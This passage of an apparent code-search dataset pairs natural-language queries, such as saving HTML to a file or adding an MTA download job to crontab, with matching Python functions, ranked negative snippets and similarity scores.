the accelerations\n sol = M.solve(B)\n\n # use SymPy's Common Subexpression Elimination\n cse_list, cse_res = sp.cse(sol, symbols=sp.numbered_symbols('q'))\n\n ################################\n # handle common subexpressions #\n ################################\n # --> leads to cse_str\n cse_str = ''\n #cse_list = [(str(l), str(r)) for l, r in cse_list]\n for cse_pair in cse_list:\n cse_str += '%s = %s; '%(str(cse_pair[0]), str(cse_pair[1]))\n\n # add result of cse\n for i in range(M_shape[0]):\n cse_str += 'q%d_dd = %s; '%(i, str(cse_res[0][i]))\n\n cse_str = cse_str[:-2]\n\n ######################\n # create vectorfield #\n ######################\n # --> leads to ff_str\n ff_str = 'ff = ['\n\n for i in range(M_shape[0]):\n ff_str += '%s, '%str(state_vars[2*i+1])\n ff_str += 'q%s_dd, '%(i)\n\n # remove trailing ',' and add closing brackets\n ff_str = ff_str[:-2] + ']'\n\n ############################\n # Create callable function #\n ############################\n # now we can replace all placeholders in the function string buffer\n fnc_str = fnc_str_buffer%(x_str, u_str, par_str, cse_str, ff_str)\n # and finally execute it which will create a python function 'f'\n # pass the current global scope to exec(). this is necessary so that sympy functions like cos/sin can be used\n globals_locals = globals()\n exec(fnc_str, globals_locals)\n\n # now we have defined a callable function that can be used within PyTrajectory\n return globals_locals['f']", "def _lin_solve(b, x, x0, a, c, iterations, n):\n c_recip = 1 / c\n for k in range(0, iterations):\n for m in range(1, n - 1):\n for j in range(1, n - 1):\n for i in range(1, n - 1):\n x[index_of(i, j, m, n)] = (x0[index_of(i, j, m, n)] + a * (x[index_of(i + 1, j, m, n)]\n + x[index_of(i - 1, j, m, n)]\n + x[index_of(i, j + 1, m, n)]\n + x[index_of(i, j - 1, m, n)]\n + x[index_of(i, j, m + 1, n)]\n + x[index_of(i, j, m - 1, n)]\n )) * c_recip\n _set_bounds(b, x, n)", "def solve(a, b):\n #-> getrf + getrs\n a, _, _ = get_computation_matrix(a)\n b, cv2, isM2 = get_computation_matrix(b)\n if a.get_dtype() != b.get_dtype():\n raise TypeError(\"solve: dtype of a and b are not compatible!\")\n if a.numRows() != a.numCols():\n raise ValueError(\"solve: input a is not a square matrix!\")\n t_dtype = TypeUtil.to_numpy_dtype(a.get_dtype())\n (_, _, x, _) = gesv(a, b, overwrite_a=1, overwrite_b=1, dtype=t_dtype)\n\n if cv2:\n if isM2:\n return x.to_numpy_matrix()\n else:\n return x.to_numpy_array()\n else:\n return x", "def solve(self, matrix, offset=0, temp_start=_DEFAULT_temp_start,\n temp_end=_DEFAULT_temp_end, tau=_DEFAULT_tau, beta=_DEFAULT_beta,\n maximize=_DEFAULT_maximize, algorithm=_DEFAULT_algorithm):\n self.api_instance = qc_qubosolv_api.ProblemApi(\n qc_qubosolv_api.ApiClient(self.configuration)\n )\n self.body = qc_qubosolv_api.Task()\n\n if isinstance(matrix, np.ndarray):\n self.body.matrix = matrix.tolist()\n else:\n self.body.matrix = matrix\n\n self.body.parameter = qc_qubosolv_api.Parameter()\n self.body.parameter.temp_start = temp_start\n self.body.parameter.temp_end = temp_end\n self.body.parameter.tau = tau\n self.body.parameter.beta = beta\n self.body.parameter.maximize = maximize\n self.body.parameter.algorithm = algorithm\n response_json = self.api_instance.task_post(self.body)\n self.response = SolverResult(json.loads(response_json), offset)\n return self.response", "def mprofile(r, alpha, beta,A,B):\n res = A*(1+(r/alpha)**2)**(-beta)+B\n return res" ]
[ "0.5931735", "0.56649315", "0.54215354", "0.5396154", "0.53851146", "0.53457224", "0.53208566", "0.53011686", "0.5298094", "0.52892774", "0.52748114", "0.52657866", "0.5221529", "0.5201853", "0.51484877", "0.5136199", "0.51290214", "0.51139814", "0.50912726", "0.508557", "0.50837845", "0.5074787", "0.5068235", "0.5068043", "0.50516355", "0.50391096", "0.5037902", "0.50341165", "0.5033496", "0.50207967" ]
0.63691556
0
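The solve_system document above builds b from a known solution vector so the solver's error can be measured afterwards. A self-contained sketch of that idea with SciPy's sparse direct solver; the tridiagonal test matrix below is a stand-in for the file-loaded A, and the snippet's sol_error helper is replaced by an explicit relative-error norm:

```python
import numpy as np
import scipy.sparse as sp
import scipy.sparse.linalg as sla

# Small, well-conditioned sparse test matrix (stand-in for the
# matrix the record loads from a file).
n = 100
A = sp.diags([1.0, 4.0, 1.0], offsets=[-1, 0, 1], shape=(n, n), format="csc")

# Choose b so that the true solution is x = [0, 1, 2, ..., n-1].
true_x = np.arange(n, dtype=float)
b = A.dot(true_x)

# Direct solve, then measure the error against the known solution.
x = sla.spsolve(A, b)
err = np.linalg.norm(x - true_x) / np.linalg.norm(true_x)
print("relative error: %.2e" % err)
assert err < 1e-10
```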
Adds a command to the system crontab to download the MTA data.
def add_cron_job(nondated_url, curr_date):
    user = os.environ.get('USER', '')
    if user == '':
        usage("no USER env var set.")
    api_key = os.environ.get('MTA_API_KEY', '')
    if api_key == '':
        usage("no MTA_API_KEY env var set. Please add `export MTA_API_KEY=<KEY>` "
              "to .bashrc/.zshrc and try again.")
    if platform.system().startswith('Windows'):
        cron = CronTab(tab="""50 23 * * * pyenv activate mta && python {}/cron.py {} {} {} {} {} {}""".format(
            os.getcwd(), api_key, curr_date, BASE_DIR,
            REALTIME_COLOR_TO_FEEDID[LINE], LINE, STATS_FILENAME))
        cron.write()
    else:
        cron = CronTab(user="{}".format(user))
        job = cron.new(
            command="pyenv activate mta && python {}/cron.py {} {} {} {} {} {}".format(
                os.getcwd(), api_key, curr_date, BASE_DIR,
                REALTIME_COLOR_TO_FEEDID[LINE], LINE, STATS_FILENAME),
            comment="mta_downloader-{}".format(FILENAME_TS))
        job.setall('50 23 * * *')
        cron.write()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cli(date, path, mission):\n download.main(path, mission, date)", "def add_daily(name, user, command, environment=None):\n add_task(name, '@daily', user, command, environment)", "def update_crontab(new_crontab):\n subprocess.run([\"crontab\", \"-\"], check=True, capture_output=True, text=True, input=\"\\n\".join(new_crontab))", "def add_task(name, timespec, user, command, environment=None):\n if environment is None:\n environment = {}\n\n lines = []\n\n # Write optional environment variables first\n for key, value in environment.iteritems():\n lines.append('%(key)s=%(value)s\\n' % locals())\n\n # Write the main crontab line\n lines.append('%(timespec)s %(user)s %(command)s\\n' % locals())\n\n from fabtools.require.files import file as require_file\n require_file(\n path='/etc/cron.d/%(name)s' % locals(),\n contents=''.join(lines),\n owner='root',\n mode='0644',\n use_sudo=True,\n )", "def _getcrontab(self):\n\t\twith os.popen(\"crontab -l 2>/dev/null\") as f:\n\t\t\tself.crontab = f.read()", "def cron(self):\n return", "def download_command(job_name, job_namespace, zone, cluster, project):\n command = LOGS_DOWNLOAD_COMMAND.format(**{\n 'project': project,\n 'zone': zone,\n 'namespace': job_namespace,\n 'pod': job_name,\n 'cluster': cluster\n })\n return command", "def setupcron():\n click.echo(\"Note that you should have run `dio setupemail` before this, or it will error out every time\")\n curr_cron = crontab.CronTab(user=True)\n if len(list(curr_cron.find_comment(\"diogenes8\"))) > 0:\n pass # do nothing\n else:\n job = curr_cron.new(command=\"dio recs\", comment=\"diogenes8\")\n job.hour.on(15)\n curr_cron.write_to_user(user=True)", "def set_download(self):\n print 'Setting download command...'\n wget = 0\n urllib = 0\n # JULIE : Cut proxy stuff...was causing problems (see scalapack installer if you want it back)\n if urllib == 0:\n # if urllib2 is not present checks if wget is present\n # in the PATH and if yes it sets the download command\n # to be wget\n print \"Checking availablility of wget...\",\n path=str(os.getenv('PATH')).split(os.pathsep)\n for i in path:\n if (os.path.isfile(os.path.join(i,'wget'))):\n print \"available\"\n wget = 1\n break\n if wget:\n # test wget\n print \"Testing wget...\",\n comm = 'wget --tries=2 --timeout=5 http://www.netlib.org/lapack/index'\n (output, error, retz) = runShellCommand(comm)\n if(retz != 0):\n print 'not working.'\n wget = -1\n else:\n print \"working\"\n self.downcmd=\"wget\"\n os.remove(\"index\")\n return\n else:\n # wget not available\n print \"not available\"\n wget=0", "async def _start_cron_task(self):\n pass", "def _get_cmd(self, url, options):\n if os.name == 'nt':\n cmd = [self.youtubedl_path] + options + [url]\n else:\n cmd = ['python', self.youtubedl_path] + options + [url]\n\n return cmd", "def downloadFile()-> None:\n logging.info(f\"Downloading current data set {getTime()}\")\n with open(DATA_FILE,\"wb\") as f:\n f.write(get(\"https://covid.ourworldindata.org/data/owid-covid-data.csv\").text.encode())\n logging.info(f\"Finished Downloading current data set {getTime()}\")", "def cronjobs():\n cj.update_cronjob_db()", "def add_task(self,verbose = False):\n t = testrun()\n t.url = self.url\n t.runnable = self\n t.script = self.script\n t.location = self.location\n t.save()\n print \"Adding %s\" %(t)\n t.submit_to_wpt()", "def __download(self, year, month, day):\n print 'Download...'\n logging.info('[download]->Download...')\n t = datetime.datetime(year, month, day)\n spdata.download(stime=t, 
stations=self.aodSetting.stations, ftp_dir=self.aodSetting.ftp_root, data_dir=self.aodSetting.dd_dir, ftp_ip=self.aodSetting.ftp_ip,\n user=self.aodSetting.ftp_user, pword=self.aodSetting.ftp_psw)\n print 'Download Done!'\n logging.info('[download]->Download Done!')", "def download_command(arguments: List[str]) -> None:\n if len(arguments) != 3:\n print('Required 2 argument for download command') # noqa: WPS421\n return\n token = token_load.load()\n logic.download(token, gist_id=arguments[1], dest_path=arguments[2])", "def make_cron_command_task_daemon():\n # cmd_logger = '@reboot sudo -u {user_logger} {python_pathbin}/enerpi-daemon start'\n cmd_logger = 'sudo -u {user_logger} {python_pathbin}/enerpi-daemon start'\n local_params = dict(user_logger=CONFIG.get('ENERPI_DATA', 'USER_LOGGER', fallback='pi'),\n python_pathbin=os.path.dirname(sys.executable))\n return cmd_logger.format(**local_params)", "def download_command(self, args):\n self._validate_common(args)\n self._set_manifests(args)\n\n manifest = self._manager._remote\n manifest.load()\n\n records = self._get_matching_records(args, manifest)\n\n if not len(records):\n sys.exit(\"No matching items found.\")\n\n for record in records:\n try:\n self._manager.download(record['_type'], **record)\n print('Successfully downloaded file: {}'.format(record['_path']))\n except exceptions.ImmutableManifestError as e:\n if args.no_update:\n print('Asset already exists; will not download: {}'.format(record['_path']))\n else:\n raise e\n\n if len(records) > 1:\n print('All files successfully downloaded. Thank you.')", "def download(ctx: click.Context, **kwargs):\n root_commands.cmd_download(ctx.obj, **kwargs)", "def download_mission(self):\n cmds = self.vehicle.commands\n cmds.download()\n # Wait until download is complete.\n cmds.wait_valid()", "def download(self, output):\n self.wait()\n path = 'auditlogEntryReport/download'\n with open(output, 'w') as f:\n f.write(self._session.get(path))\n LOGGER.info('log downloaded: {}'.format(output))", "def _(event):\n\t\t\tself.continued_failure = 0\n\t\t\t\n\t\t\tif event.target is not self.download_thread:\n\t\t\t\treturn\n\t\t\t\t\n\t\t\tcmd = event.data.module.config.get(\"runafterdownload\")\n\t\t\tdefault_cmd = setting.get(\"runafterdownload\")\n\t\t\t\n\t\t\tcommands = []\n\t\t\t\n\t\t\tif cmd:\n\t\t\t\tcommands.append(cmd)\n\t\t\t\t\n\t\t\tif default_cmd and default_cmd not in commands:\n\t\t\t\tcommands.append(default_cmd)\n\t\t\t\n\t\t\tdef run_command():\n\t\t\t\tfor command in commands:\n\t\t\t\t\ttarget = quote(path_join(\n\t\t\t\t\t\tprofile(event.data.module.config[\"savepath\"]),\n\t\t\t\t\t\tsafefilepath(event.data.title)\n\t\t\t\t\t))\n\t\t\t\t\tif \"{target}\" in command:\n\t\t\t\t\t\tcommand = command.format(target=target)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcommand += \" \" + target\n\t\t\t\t\tprint(f\"run command: {command}\")\n\t\t\t\t\ttry:\n\t\t\t\t\t\tawait_(subprocess.call, command, shell=True) # nosec\n\t\t\t\t\texcept (OSError, subprocess.SubprocessError):\n\t\t\t\t\t\ttraceback.print_exc()\n\n\t\t\tasync_(run_command)", "def _Download( self ):\n self._DownloadPipe += PackageUtil.ExecuteSimpleCommand( \"git\", [\"clone\", \"[email protected]:mastbaum/avalanche.git\", self.GetInstallPath()], None, os.getcwd() )\n return", "def main():\n # the url for african daily and global daily\n african_dialy_url = \"https://data.chc.ucsb.edu/products/CHIRPS-2.0/africa_daily/tifs/p25/\"\n global_daily_url = \"https://data.chc.ucsb.edu/products/CHIRPS-2.0/global_daily/tifs/p25/\"\n\n\n 
each_year_list = GetRasterYears(url=african_dialy_url)\n new_path = makenewdir(each_year_list)\n years_new_list = fecthrasterurl(url=african_dialy_url)\n downloadwithwget(each_year_list, years_new_list, new_path)", "def save_data(self):\n # Command to get the download data\n pass", "def downloadTempGrab(self, url):\n if os.path.exists(\"temp.dat\"):\n os.remove(\"temp.dat\")\n cmd = \"wget -q -T 3 -t 1\" # 1 attempt (no retries)\n cmd += \" -O %s %s\" % (\"temp.dat\", url)\n self.log(cmd)\n process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n process.wait()", "def cli():\n fire.Fire(fetch_rss_file)", "def download_file(path, filename, destination):\n import os\n command = \"wget -q -O \"+destination+\"/\"+filename+\" ftp://nomads.ncdc.noaa.gov/\"+path+\"/\"+filename\n os.system(command)", "def get(self):\n url = \"http://twitter.com/statuses/public_timeline.json\"\n task = taskqueue.Task(\n url='/tasks/fetch',\n params={'url': url}\n )\n task.add('fetch')", "def logruncmd(self, cmd):\n self.logtxt(\"\\n[%s %s]\" % (datetime.datetime.now(), os.getcwd()), 'info')\n self.logtxt(\"%s\" % cmd, 'cmd')" ]
[ "0.6217518", "0.5839289", "0.5613374", "0.56113803", "0.5583703", "0.5540043", "0.53430545", "0.5286042", "0.52517474", "0.51973224", "0.5182088", "0.5155778", "0.5139559", "0.5131635", "0.5130064", "0.50975126", "0.50848424", "0.50634307", "0.5028002", "0.49883255", "0.49630895", "0.49507952", "0.4937796", "0.49339712", "0.492496", "0.4911067", "0.48969632", "0.48322538", "0.4827638", "0.48080146" ]
0.63708776
0
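The add_cron_job document and several of its negatives share the same python-crontab flow: open a user crontab, create a job tagged with a comment, set its schedule, write. A stripped-down sketch of that flow; the command string and comment are placeholders, and write() is left commented out so running the sketch does not modify a real crontab:

```python
from crontab import CronTab  # pip install python-crontab

# Open the invoking user's crontab.
cron = CronTab(user=True)

# One job, tagged with a comment so it can be found and removed later.
job = cron.new(
    command="python /opt/mta/cron.py",  # placeholder command
    comment="mta_downloader",
)
job.setall("50 23 * * *")  # every day at 23:50, as in the record above

assert job.is_valid()
# cron.write()  # uncomment to actually install the job

# Removal later works by the same comment tag:
# cron.remove_all(comment="mta_downloader")
# cron.write()
```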
Saves the HTML in the specified filename at the given path
def saveHtml(path: str, filename: str, html: str) -> str:
    filepath = os.path.join(path, filename)
    with open(filepath, "w") as fileHandle:
        fileHandle.write(html)
    return filepath
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def save(self, filename):\n outfile = open(filename, \"w\")\n outfile.write(self.html.encode('utf8'))\n outfile.close()", "def make_backup(filename, html):\n\n with open(filename, 'wb') as f:\n f.write(html)", "def htmlSaveFile(self, filename):\n ret = libxml2mod.htmlSaveFile(filename, self._o)\n return ret", "def save(self):\n html_file = '{}/{}.html'.format(self.web_dir, self.title)\n f = open(html_file, 'wt')\n f.write(self.doc.render())\n f.close()", "def savecontents(contents, pathname):\n _maybe_mkdir(pathname)\n with open(pathname, 'w') as htmlfile:\n htmlfile.write(contents)", "def save_page_as(browser, file_name):\n\n with open(file_name, \"w\") as fout:\n fout.write(browser.find_element_by_tag_name(\"pre\").text)", "def save(self):\n f=open(\"{}/{}.html\".format(self.path,self.name),\"w\")\n f.write(\"<html>\\n <head>\\n\")\n for c in self.css:\n f.write(\" <link rel=\\\"Stylesheet\\\" href=\\\"{}\\\" />\\n\".format(c))\n f.write(\" </head>\\n</body>\\n\")\n for line in self.template.split(\"\\n\"):\n f.write(\" {}\\n\".format(line))\n f.write(\" </body>\\n</html>\")\n f.close()", "def saveToFile(html):\n #print(\"Saving to file.\")\n html += \"\\n\"\n #open necessary files to save\n logFile = open(\"postLog_{0}_{1}.txt\".format(os.path.splitext(path)[0], dateTimeNow), \"a\")\n logFile.write(html)\n logFile.close()\n #print(\"Check Point.\")", "def _write_file(self, slug, folderpath, html):\n # check directories\n if not os.path.isdir(folderpath):\n try:\n os.makedirs(folderpath)\n self.info(\"Creating directory \" + folderpath)\n except Exception as e:\n self.err(e)\n return\n # construct file path\n filepath = folderpath + \"/\" + slug + \".html\"\n # write the file\n try:\n filex = open(filepath, \"w\")\n filex.write(html)\n filex.close()\n if self.notebook is False:\n self.ok(\"File written to\", filepath)\n else:\n html = '<a href=\"' + filepath + '\">' + filepath + '</a>'\n self.html(\"File written to\", html)\n except Exception as e:\n self.err(e)\n return filepath", "def save_html(self, file_name=None, raw_html=True):\n if raw_html:\n with open(file_name or self.url_obj.file_path, 'wb') as fh:\n fh.write(self.raw_html)\n else:\n self.lxml.getroottree().write(file_name or self.url_obj.file_path, method=\"html\")", "def write_to_html_file(self, data: str):\n try:\n os.mkdir(\"../\" + self.uri)\n except FileExistsError:\n pass\n\n f = open(\"../\" + self.uri + self.file_name, \"w\")\n f.write(data)\n print(\"[WRITE] written to .html file\")\n f.close()", "def save_into_html_file(path_html_file: str, response):\n html_file = open(path_html_file, 'w')\n html_file.writelines(response)\n html_file.close()\n\n with zipfile.ZipFile(path_html_file.replace('.html', '.zip'), 'w') as zf:\n zf.write(path_html_file, compress_type=zipfile.ZIP_DEFLATED)\n zf.close()\n os.remove(path_html_file)", "def save_html_files(dir_out, htmls, filenames):\n html_directory = os.path.join(dir_out, \"html\")\n for html, filename in zip(htmls, filenames):\n export_path = os.path.join(html_directory, filename + \".html\")\n with codecs.open(export_path, \"w\", encoding=\"utf-8\") as invoice_file:\n invoice_file.writelines(html)", "def save(self, path, project_name=\"project\"):\n save_path = os.path.join(path, self.save_path)\n save_path = re.sub(r\"/^{}/\".format(self.template.name), project_name, save_path)\n try:\n os.makedirs(os.path.dirname(save_path))\n except FileExistsError:\n pass\n file = open(save_path, \"w\")\n file.write(self.text)\n file.close()\n print(\"save file: \", save_path)", "def 
write_to_file(fname, html_body):\n dir_path = os.path.dirname(fname)\n ensure_dir_exists(dir_path)\n\n with open(fname, 'w') as html_file:\n html_file.write(html_body)", "def write_file(self, contents):\n fd = open(os.path.join(os.path.dirname(__file__),\n 'data', 'test.html'), 'w')\n fd.write(contents)\n fd.close()", "def to_file(self, html_file: str = None) -> None:\n if not html_file:\n html_file = f\"{self.id}.html\"\n\n with open(html_file, \"w\") as f:\n f.write(self.soup.html)", "def write_html_file (folder, filename, contents):\n\n result = False\n\n try:\n f = codecs.open(os.path.join(folder, filename), 'w', ENCODING)\n f.write(contents)\n f.close()\n result = True\n except (OSError, IOError):\n print \"Sorry, could not save contents in\", os.path.join(folder, filename)\n\n return result", "def make_file():\n get_content = input(\"Paste the content for your html file, include your doctype, html tags and header, body etc.\\n\")\n get_name = input(\"what do you want to call your file?\\n\")\n \n new_html_file = open(str(get_name) + '.html', 'w')\n page_content = \"\" + str(get_content) + \"\"\n \n new_html_file.write(page_content)\n new_html_file.close()", "def exportHtmlFile(self):\n\n fileName = QtGui.QFileDialog.getSaveFileName(None,\"Save html file\", os.getenv('HOME'))\n if fileName:\n fileName += \".html\"\n #print ((\"Exporting: to \" + fileName))\n filedata = \"<html>\\n<head>\\n<title>\" + self.settings['projectName'] + \"</title>\\n</head>\\n<body>\\n\"\n #filedata += str(self.htmlResults.encode('utf-8'))\n modData = \"\"\n for c in self.htmlResults:\n if ord(c) < 128:\n modData += c\n else:\n modData += \"&#\" + str(ord(c)) + \";\"\n filedata += modData\n filedata += \"</body>\\n</html>\"\n f = open(fileName, 'w')\n f.write(filedata)\n f.close()\n self.log += \"Search Results exported to \" + fileName + \"\\n\"\n QtGui.QMessageBox.information(None, \"Html file Export\", str(fileName) + \" exported\")", "def save_news_in_html_file(news, path_to_html, logger):\n check_path_to_directory(path_to_html, logger)\n html_file = tags.html(title='RSS news')\n html_file.add(tags.head(tags.meta(charset='utf-8')))\n\n logger.info('Converting news to html format...')\n for article in news:\n html_factory(article, html_file)\n\n path = os.path.join(path_to_html, 'rss_news.html')\n logger.info('Creating html-file...')\n with open(path, 'w', encoding='utf-8') as file_html:\n file_html.write(str(html_file))\n logger.info('Html-file is created successfully!')\n return file_html", "def save(self, content_dir):\n print_verbose(\n \"INFO : Writing random HTML documents to files...\",\n self.args.verbose,\n )\n for i in range(self.n):\n dir_path = content_dir + \"/\" + \"staticpage\" + str(i)\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n index_file = os.path.join(dir_path, \"index.html\") \n with open(index_file, \"w\") as file:\n file.write(self.doc_strings[i].decode(\"utf-8\"))", "def save_html(self, report_summary, file_name, folder):\n myfile = open(file_name, \"w\")\n myfile.write(t('! 
DOCTYPE html') + nl())\n myfile.write(t('html') + nl())\n myfile.write(t('head') + nl())\n myfile.write(t('link type=\"text/css\" rel=\"stylesheet\" ') + nl())\n\n myfile.write(html_space(4) + t('style'))\n myfile.write('table{width= 100%; border-collapse:collapse; border:1px solid black collapse}')\n myfile.write('th,td {padding:3px}' + nl())\n myfile.write(html_space(8) + 'td.detail{background-color:#D5DF93; font-size:20; '\n 'font-family:Helvetica, Arial, Sans Serif; font-weight:bold}' + nl())\n myfile.write(html_space(8) + 'td.detail1{font-size:20; '\n 'font-family:Helvetica, Arial, Sans Serif; font-weight:bold}' + nl())\n myfile.write(html_space(8) + 'td.detail2{font-size:20;'\n ' font-family:Helvetica, Arial, Sans Serif}' + nl())\n myfile.write(html_space(8) + 'td.header0{background-color:#8fac3a; font-size:20;'\n ' font-family:Helvetica, Arial, Sans Serif; font-weight:bold}' + nl())\n myfile.write(html_space(8) + 'td.header1{background-color:#E6E6E6; font-size:20;'\n ' font-family:Helvetica, Arial, Sans Serif; font-weight:bold}' + nl())\n myfile.write(html_space(8) + 'td.header2{font-size:20; width:50%}' + nl())\n myfile.write(html_space(4) + t('/style') + nl())\n\n myfile.write(t('/head') + nl())\n myfile.write(t('body') + nl())\n\n # Project summary\n self.company_name = str(report_summary[\"ProfileSummary\"]['CompanyName'])\n self.company_logo = str(report_summary[\"ProfileSummary\"]['CompanyLogo'])\n\n self.group_team_name = str(report_summary[\"ProfileSummary\"]['Group/TeamName'])\n self.designer = str(report_summary[\"ProfileSummary\"]['Designer'])\n self.project_title = str(report_summary['ProjectTitle'])\n self.sub_title = str(report_summary['Subtitle'])\n self.job_number = str(report_summary['JobNumber'])\n self.client = str(report_summary['Client'])\n additional_comments = str(report_summary['AdditionalComments'])\n\n # Seated angle design parameters\n connectivity = str(self.connectivity)\n shear_force = str(self.shear_force)\n column_sec = str(self.column_section)\n column_fu = str(self.column_fu)\n beam_sec = str(self.beam_section)\n seated_angle_section = str(self.angle_sec)\n top_angle_section = str(self.top_angle)\n angle_fu = str(self.angle_fu)\n\n bolt_type = str(self.bolt_type)\n is_hsfg = self.is_hsfg\n bolt_grade = str(self.bolt_grade)\n bolt_diameter = str(self.bolt_diameter)\n bolt_fu = str(self.bolt_fu)\n is_environ_corrosive = self.is_environ_corrosive\n\n # Design Preferences\n detail_gap = str(self.detail_gap)\n bolt_hole_clearance = str(self.bolt_hole_clearance)\n bolt_hole_type = str(self.bolt_hole_type)\n bolt_material_grade = self.bolt_fu_overwrite\n slip_factor_mu_f = self.mu_f\n min_edge_multiplier = self.min_edge_multiplier\n type_of_edge = self.type_of_edge\n design_method = self.design_method\n\n # Calculation outputs\n bolts_provided = str(self.bolts_provided)\n bolts_required = str(self.bolts_required)\n\n number_of_rows = str(self.num_rows)\n number_of_cols = str(self.num_cols)\n edge = str(self.edge_dist)\n gauge = str(self.gauge)\n pitch = str(self.pitch)\n end = str(self.end_dist)\n\n kb = str(self.k_b)\n beam_w_t = str(self.beam_w_t)\n beam_fu = str(self.beam_fu)\n dia_hole = str(self.bolt_hole_diameter)\n shear_capacity = str(self.bolt_shear_capacity)\n bearing_capacity = str(self.bolt_bearing_capacity)\n\n check_pass = \"<p align=left style=color:green><b>Pass</b></p>\"\n check_fail = \"<p align=left style=color:red><b>Fail</b></p>\"\n\n if self.safe == True:\n remark = check_pass\n elif self.safe == False:\n remark = check_fail\n\n # 
-----------------------------------------------------------------------------------\n rstr = self.design_report_header()\n # -----------------------------------------------------------------------------------\n\n # ---------------------------------- Design conclusion ------------------------------\n rstr += t('table border-collapse= \"collapse\" border=\"1px solid black\" width= 100% ') + nl()\n\n rstr += design_summary_row(0, \"Design Conclusion\", \"header0\", col_span=\"2\")\n\n row = [1, \"Seated Angle\", remark]\n rstr += t('tr')\n rstr += html_space(1) + t('td class=\"detail1 \"') + space(row[0]) + row[1] + t('/td')\n rstr += t('td class=\"detail1\"') + row[2] + t('/td') + nl()\n # rstr += t('td class=\"header1 safe\"') + row[3] + t('/td')\n rstr += t('/tr')\n\n rstr += design_summary_row(0, \"Seated Angle\", \"header0\", col_span=\"2\")\n rstr += design_summary_row(0, \"Connection Properties\", \"detail\", col_span=\"2\")\n rstr += design_summary_row(0, \"Connection \", \"detail1\", col_span=\"2\")\n rstr += design_summary_row(1, \"Connection Title\", \"detail2\", text_two=\" Seated Angle\")\n rstr += design_summary_row(1, \"Connection Type\", \"detail2\", text_two=\" Shear Connection\")\n rstr += design_summary_row(0, \"Connection Category\", \"detail1\")\n rstr += design_summary_row(1, \"Connectivity\", \"detail2\", text_two=str(connectivity))\n rstr += design_summary_row(1, \"Beam Connection\", \"detail2\", text_two=\"Bolted\")\n rstr += design_summary_row(1, \"Column Connection\", \"detail2\", text_two=\"Bolted\")\n rstr += design_summary_row(0, \"Loading (Factored Load)\", \"detail1\")\n rstr += design_summary_row(1, \"Shear Force (kN)\", \"detail2\", text_two=str(shear_force))\n rstr += design_summary_row(0, \"Components \", \"detail1\", col_span=\"2\")\n rstr += design_summary_row(1, \"Column Section\", \"detail1\", text_two=str(column_sec), text_two_css=\"detail2\")\n rstr += design_summary_row(2, \"Material\", \"detail2\", text_two=\"Fe \" + str(column_fu))\n rstr += design_summary_row(2, \"Hole\", \"detail2\", text_two=str(bolt_hole_type))\n rstr += design_summary_row(1, \"Beam Section\", \"detail1\", text_two=str(beam_sec), text_two_css=\"detail2\")\n rstr += design_summary_row(2, \"Material\", \"detail2\", text_two=\"Fe \" + str(beam_fu))\n rstr += design_summary_row(2, \"Hole\", \"detail2\", text_two=str(bolt_hole_type))\n rstr += design_summary_row(1, \"Seated Angle Section\", \"detail1\", text_two=str(seated_angle_section),\n text_two_css=\"detail2\")\n rstr += design_summary_row(2, \"Material\", \"detail2\", text_two=\"Fe \" + str(angle_fu))\n rstr += design_summary_row(2, \"Hole\", \"detail2\", text_two=str(bolt_hole_type))\n rstr += design_summary_row(1, \"Top Angle Section\", \"detail1\", text_two=str(top_angle_section),\n text_two_css=\"detail2\")\n rstr += design_summary_row(2, \"Material\", \"detail2\", text_two=\"Fe \" + str(angle_fu))\n rstr += design_summary_row(2, \"Hole\", \"detail2\", text_two=bolt_hole_type)\n rstr += design_summary_row(1, \"Bolts\", \"detail1\", col_span=\"2\")\n rstr += design_summary_row(2, \"Type\", \"detail2\", text_two=bolt_type)\n rstr += design_summary_row(2, \"Grade\", \"detail2\", text_two=bolt_grade)\n rstr += design_summary_row(2, \"Diameter (mm)\", \"detail2\", text_two=bolt_diameter)\n rstr += design_summary_row(2, \"Bolts - Required\", \"detail2\", text_two=bolts_required)\n rstr += design_summary_row(2, \"Bolts - Provided\", \"detail2\", text_two=bolts_provided)\n rstr += design_summary_row(2, \"Rows\", \"detail2\", 
text_two=number_of_rows)\n rstr += design_summary_row(2, \"Columns\", \"detail2\", text_two=number_of_cols)\n rstr += design_summary_row(2, \"Gauge (mm)\", \"detail2\", text_two=gauge)\n rstr += design_summary_row(2, \"Pitch (mm)\", \"detail2\", text_two=pitch)\n rstr += design_summary_row(2, \"End Distance (mm)\", \"detail2\", text_two=end)\n rstr += design_summary_row(2, \"Edge Distance (mm)\", \"detail2\", text_two=edge)\n rstr += design_summary_row(0, \"Assembly\", \"detail1\", col_span=\"2\")\n rstr += design_summary_row(1, \"Column-Beam Clearance (mm)\", \"detail2\", text_two=detail_gap,\n text_two_css=\"detail2\")\n\n rstr += \" \" + nl() + t('/table')\n rstr += t('h1 style=\"page-break-before:always\"') # page break\n rstr += t('/h1')\n\n # -----------------------------------------------------------------------------------\n rstr += self.design_report_header()\n # -----------------------------------------------------------------------------------\n\n # --------------------------------- Design Preferences ------------------------------\n # Write your code here\n\n\n # -----------------------------------------------------------------------------------\n rstr += self.design_report_header()\n # -----------------------------------------------------------------------------------\n\n # ------------------------------------ DESIGN CHECKS ---------------------------------\n rstr += t('table width = 100% border-collapse= \"collapse\" border=\"1px solid black\" table-layout:fixed')\n rstr += t('tr')\n rstr += t('td style=\"width:200px;\"')\n rstr += t('td width=\"50%\"')\n rstr += t('td width=\"50%\"')\n rstr += t('td style=\"width:50px;\"')\n rstr += t('/tr')\n rstr += design_check_row(\"Design Check\", \"\", \"\", \"\", col_span=\"4\", text_one_css=\"detail\")\n\n rstr += design_check_row(\"Check\", \"Required\", \"Provided\", \"Remark\", text_one_css=\"header1\",\n text_two_css=\"header1\", text_three_css=\"header1\", text_four_css=\"header1\")\n\n # Bolt\n rstr += design_check_row(\"Bolt Checks\", \"\", \"\", \"\", col_span=\"4\", text_one_css=\"detail\")\n\n # Bolt shear capacity (kN)\n const = str(round(math.pi / 4 * 0.78, 4))\n if is_hsfg == False:\n req_field = \"<i>V</i><sub>dsb</sub> = bolt_fu*(pi*0.78/4)*bolt_diameter^2/(&#8730;3)/\" \\\n \"<i>gamma<sub>mb</sub></i><br> [cl. 10.3.3]\"\n prov_field = \"<i>V</i><sub>dsb</sub> = \" + bolt_fu + \"*(\" + const + \")*\" + bolt_diameter + \"^2/\" 